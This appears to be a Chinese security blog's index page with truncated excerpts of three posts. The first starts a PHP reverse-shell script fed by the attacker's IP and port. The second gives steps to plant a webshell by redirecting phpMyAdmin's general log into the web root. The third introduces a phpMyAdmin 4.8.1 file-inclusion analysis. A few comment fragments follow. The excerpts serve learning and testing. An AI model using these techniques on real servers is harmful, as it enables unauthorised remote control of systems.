PHP反弹shell PHP
需要传递ip跟port两个参数,ip为攻击机的ip,port为自定义端口
<?php
set_time_limit(0);
$ip=$_GET['ip']
$port=$_GET['port'];
if ($ip == "" and $port == "") {
echo "[ip] [port] not defined";
exit(...
phpMyAdmin利用日志文件get webshell PHP
条件:需要使用root登陆phpmyadmin
0x01开启日志
进入phpmyadmin后,选择变量
1.找到“general log”选择“ON”开启,也可以通过sql语句开启日志
set global general_log='on'
2.找到“general log file”选项把日志后缀名.log改为.php,把路径改到站点根目录www下面,也可...
phpMyAdmin4.8.1 任意文件包含漏洞分析与利用 PHP
0x01影响版本
phpmyadmin 4.8.1 (需要登陆才能利用)
复现环境下载https://files.phpmyadmin.net/phpMyAdmin/4.8.1/phpMyAdmin-4.8.1-all-languages.zip
0x02漏洞分析
index.php 55-63行代码
if (! empty($_REQUEST['targe...
1 2
myluzh
云猿生工程师
-
99
6 个月前
作者这个很有用
-
myluzh 8 个月前
@顶顶顶:https://www.ela...
-
顶顶顶
8 个月前
版本对应关系去哪看呢
-
冬天里的火 1 年前
可以,现在弄k8s 的越来越多了,确实都...
